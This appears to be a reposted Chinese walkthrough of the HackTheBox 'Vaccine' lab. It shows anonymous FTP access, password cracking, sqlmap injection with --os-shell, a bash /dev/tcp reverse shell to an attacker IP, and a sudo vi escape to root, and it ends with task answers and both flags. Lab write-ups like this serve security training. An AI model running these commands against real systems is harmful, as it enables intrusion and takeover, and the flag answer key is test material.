HackTheBox-Starting Point--Tier 2---Vaccine

news2024/11/25 15:53:25

文章目录

  • 一 Vaccine 测试过程
    • 1.1 打点
      • 1.1.1 FTP匿名登录
      • 1.1.2 SQL注入
    • 1.2 权限提升
  • 二 题目


一 Vaccine 测试过程


1.1 打点

  1.端口扫描

nmap -sV -sC 10.129.191.63

在这里插入图片描述


1.1.1 FTP匿名登录


  2.FTP允许匿名登录,发现backup.zip

ftp 10.129.191.63

在这里插入图片描述

  解压backup.zip,但是需要密码:

在这里插入图片描述

3.使用john解密backup.zip

# 获得中间Hash文件
zip2john backup.zip > hashes

在这里插入图片描述

cat hashes

在这里插入图片描述

# 暴力破解hash
john -wordlist=rockyou.txt hashes

在这里插入图片描述
  使用获取到的密码解压backup.zip 密码:741852963

4.backup.zip文件信息泄漏

  解压完成后,发现index.php、style.css,查看index.php,发现用户名admin和密码hash

在这里插入图片描述

admin:2cb42f8734ea607eefed3b70af13bbd3

5.破解密码

  检测密码2cb42f8734ea607eefed3b70af13bbd3属于哪种hash

hashid 2cb42f8734ea607eefed3b70af13bbd3

在这里插入图片描述

  爆破hash密码,得到密码是qwerty789

echo '2cb42f8734ea607eefed3b70af13bbd3' > hash
hashcat -a 0 -m 0 hash rockyou.txt    

在这里插入图片描述


1.1.2 SQL注入


6.访问80端口,admin:qwerty789登录
在这里插入图片描述

在这里插入图片描述

7.搜索接口使用$searc变量,尝试对其进行注入
在这里插入图片描述

sqlmap -u 'http://10.129.191.63/dashboard.php?search=any+query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" -batch

在这里插入图片描述

  存在注入漏洞,使用sqlmap的os-shell参数获取一个shell

sqlmap -u 'http://10.129.191.63/dashboard.php?search=any+query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" -batch --os-shell

在这里插入图片描述

8.获取反弹shell

  开启监听:

ncat -lnvp 1234

  执行反弹shell:

bash -c "bash -i >& /dev/tcp/10.10.14.20/1234 0>&1"

在这里插入图片描述

在这里插入图片描述

  获取交互式shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

  获取用户flag:

在这里插入图片描述


1.2 权限提升


1.在postgres用户shell中寻找有用线索

  在/var/www/html目录下发现如下文件:

在这里插入图片描述

  查看dashboard.php文件发现:

在这里插入图片描述

2.使用postgres:P@s5w0rd!进行ssh登录

在这里插入图片描述

3.查看sudo权限

sudo -l

在这里插入图片描述

  输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。

4.编辑pg_hba.conf获取shell

# 打开pg_hba.conf
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# 输入,直接输入 : 进行输入,无须打开编辑模式
:set shell=/bin/sh

在这里插入图片描述

# 打开pg_hba.conf
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# 输入,直接输入 : 进行输入,无须打开编辑模式,编辑完成使用回车退出
:shell

  获取到root权限:

在这里插入图片描述
  查找flag:
在这里插入图片描述


二 题目


Tags

Web、Network、Vulnerability Assessment、Databases、Injection、Custom Applications、Protocols、Source Code Analysis、Apache、PostgreSQL、FTP、PHP、Reconnaissance、Password Cracking、SUDO Exploitation、SQL Injection、Remote Code Execution、Clear Text Credentials、Anonymous/Guest Access

译文:Web、Network、漏洞评估、数据库、注入、自定义应用程序、协议、源代码分析、Apache、PostgreSQL数据库、FTP、PHP、侦察、密码破解、SUDO 开发、SQL注入、远程代码执行、明文凭据、匿名访问

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.

译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

SPAWN MACHINE

Spawn the target machine and the IP will show here.

译文:生成目标机器,IP 将显示在此处

TASK 1

Besides SSH and HTTP, what other service is hosted on this box?

译文:除了 SSH 和 HTTP 之外,这个盒子上还托管了哪些其他服务?

答:FTP

TASK 2


This service can be configured to allow login with any password for specific username. What is that username?

译文:此服务可以配置为允许使用特定用户名的任何密码登录。那个用户名是什么?

答:anonymous

TASK 3

What is the name of the file downloaded over this service?

译文:通过此服务下载的文件的名称是什么?

答:backup.zip

TASK 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

译文:John The Ripper 工具集附带了什么脚本,并从受密码保护的 zip 存档中以允许破解尝试的格式生成哈希值?

答:zip2john

TASK 5

What is the password for the admin user on the website?

译文:网站上管理员用户的密码是什么?

答:qwerty789

TASK 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

译文:可以向 sqlmap 传递什么选项以尝试通过 sql 注入执行命令?

答:--os-shell

TASK 7

What program can the postgres user run as root using sudo?

译文:postgres 用户可以使用 sudo 以 root 身份运行什么程序?

答:vi

SUBMIT FLAG

Submit user flag

译文:用户flag

答:ec9b13ca4d6229cd5cc1e09980965bf7

SUBMIT FLAG

Submit root flag

译文:提交root flag

答:dd6e058e814260bc70e9bbdef2715849

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1208482.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

王道计网:网络层

转发是路由器内部 路由选择是路由器之间 一、概述和功能

Vue基础必备掌握知识点-Vue的指令系统讲解(二)

Vue指令系统继续讲解 v-for 作用:基于数据进行循环,多次渲染整个元素 数据类型:数组.对象.数字。。。 遍历数组语法:v-for"(item,index)" in 数组 item:表示每一项 index:则是表现下标 注意:v-for中的key值,key属性唯一的…

《从零开始读懂相对论》

内容简介 相对论诞生至今已逾百年,但依然被人们津津乐道。相对论为什么如此有魅力?爱因斯坦为什么要创立相对论?本书从“零”开始,紧抓“相对”二字,将所有问题置于历史的背景下,竭力展现人类探索运动本质…

腾讯云2核4G服务器CVM标准型S5实例租用5年价格表

腾讯云服务器网整理五年云服务器活动 txyfwq.com/go/txy 配置可选2核4G和4核8G,公网带宽可选1M、3M或5M,系统盘为50G高性能云硬盘,标准型S5实例CPU采用主频2.5GHz的Intel Xeon Cascade Lake或者Intel Xeon Cooper Lake处理器,睿频…

软考架构师学习心得和资料分享

23年11月的软考架构师终于考完了,相信很多朋友都觉得这次考试的内容有点难,我是从9月份报名后才开始准备的,一边工作一边学习确实压力很大,感觉更难了。 报名后还在闲鱼上买了份学习资料,后来又在芝士架构群里找了一些…

一文搞定接口自动化测试框架搭建orPytest_知识点总结

pytest编写的规则: 1、测试文件以test_开头(以_test结尾也可以) 2、测试类以Test开头,并且不能带有__init__方法 3、测试函数以test_开头 4、断言必须使用assert pytest.main([-s,-v]) :用来执行测试用例 -s 打印prin…

使用matlab制作声音采样率转换、播放以及显示的界面

利用matlab做一个声音采样率转换、播放以及显示的界面 大抵流程: 图形界面创建:使用figure函数创建名为“声音采样率转换”的图形界面,并设置了其位置和大小。 按钮和文本框:使用uicontrol函数创建了选择音频文件的按钮、显示当前…

JavaScript_表单校验用户名和密码

<!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><title>注册页面</title><style>*{margin: 0px;padding: 0px;box-sizing: border-box;}body{background: url("img/register_bg.png") …

计算机视觉基础(7)——相机基础

前言 从这一节开始&#xff0c;我们来学习几何视觉。中层视觉包括相机模型、单目几何视觉、对极几何视觉和多目立体视觉等。在学习几何视觉最开始&#xff0c;我们先来学习一下相机模型&#xff0c;了解相机的基本原理&#xff0c;了解相机如何记录影像。 一、数字相机 1.1 基…

SpringCloud微服务:Ribbon负载均衡

目录 负载均衡策略&#xff1a; 负载均衡的两种方式&#xff1a; 饥饿加载 1. Ribbon负载均衡规则 规则接口是IRule 默认实现是ZoneAvoidanceRule&#xff0c;根据zone选择服务列表&#xff0c;然后轮询 2&#xff0e;负载均衡自定义方式 代码方式:配置灵活&#xff0c;但修…

SpringBoot整合WebSocket实现订阅消息推送

目录 一、什么是WebSocket1.HTTP协议2.WebSocket协议 二、WebSocket使用场景1.消息推送2.实时聊天3.弹幕4.实时数据更新 三、SpringBoot整合WebSocket&#xff08;以实现消息推送为例&#xff09;1.添加依赖2.创建消息类2.WebSocket配置类3.工具类4.测试连接5.服务调用 一、什么…

JAVA基础9:Debug

1.Debug概述 Debug:是供程序员使用的程序调试工具&#xff0c;它可以用于查看程序的执行流程&#xff0c;也可以用于追踪程序执行过程来调试程序。 2.Debug操作流程 Debug调试&#xff0c;又被称为断点调试&#xff0c;断点其实是一个标记&#xff0c;告诉我们从哪里开始查看…

自动化接口差异测试-diffy 回归测试 charles rewrite 请求

1、前言 大家好&#xff0c;今天小编向大家介绍一款自动化接口diff平台–diffy。diffy是twitter的开源项目&#xff0c;通过同时运行新/老代码&#xff0c;对比运行结果&#xff0c;发现潜在bug。diffy的原理是作为代理&#xff0c;截取请求并发送至所有运行的服务实例&#x…

【thop.profile】thop.profile计算网络参数量和计算效率

&#x1f34b;&#x1f34b;1.安装thop 安装thop有两种方式。 &#x1f3c6;第一种 pip install thop &#x1f3c6;第二种 用源码编译安装 从官网下载【github】thop安装压缩包下载压缩文件&#xff0c;解压到虚拟环境的site-packages文件下激活进入自己的虚拟环境cd到压缩…

Django实战项目-学习任务系统-任务完成率统计

接着上期代码内容&#xff0c;继续完善优化系统功能。 本次增加任务完成率统计功能&#xff0c;为更好的了解哪些任务完成率高&#xff0c;哪些任务完成率低。 该功能完成后&#xff0c;学习任务系统1.0版本就基本完成了。 1&#xff0c;编辑urls配置文件&#xff1a; ./mysi…

在windows上利用vmware17 搭建centos7 mini版本服务器

安装centos7mini 修改名称和安装路径 也可以点击自定义硬件&#xff0c;进行硬件配置修改 设置内存 设置处理器 点击下图按钮进行设置 点击done 点击开始安装 点击设置root密码 设置成功&#xff0c;点击done &#xff0c;root密码设置的简单的话需要按两次done 等待安装完成…

前端算法面试之堆排序-每日一练

如果对前端八股文感兴趣&#xff0c;可以留意公重号&#xff1a;码农补给站&#xff0c;总有你要的干货。 今天分享一个非常热门的算法--堆排序。堆的运用非常的广泛&#xff0c;例如&#xff0c;Python中的heapq模块提供了堆排序算法&#xff0c;可以用于实现优先队列&#xf…

微服务nacos实战入门

注册中心 在微服务架构中&#xff0c;注册中心是最核心的基础服务之一 主要涉及到三大角色&#xff1a; 服务提供者 ---生产者 服务消费者 服务发现与注册 它们之间的关系大致如下&#xff1a; 1.各个微服务在启动时&#xff0c;将自己的网络地址等信息注册到注册中心&#x…

四、Ribbon负载均衡

目录 一、负载均衡流程 1、我通过浏览器直接访问userservice/user/1&#xff0c;无法访问&#xff0c;说明是负载均衡做了相应的处理 2、我们来看一下代码中负载均衡的流程是怎样的 3、图像流程 二、负载均衡策略 1、修改负载均衡策略 &#xff08;方式一&#xff09; &a…

D. Jumping on Walls bfs

Problem - 199D - Codeforces 题目大意&#xff1a;有一个两个垂直的平行墙壁组成的一个峡谷。一个人初始是在左边墙壁第一层。在每个墙壁上有些障碍点&#xff0c;用X表示&#xff0c;这些障碍点不能被到达。&#xff0c;他可以执行以下三个操作&#xff1a; 向当前墙壁往上…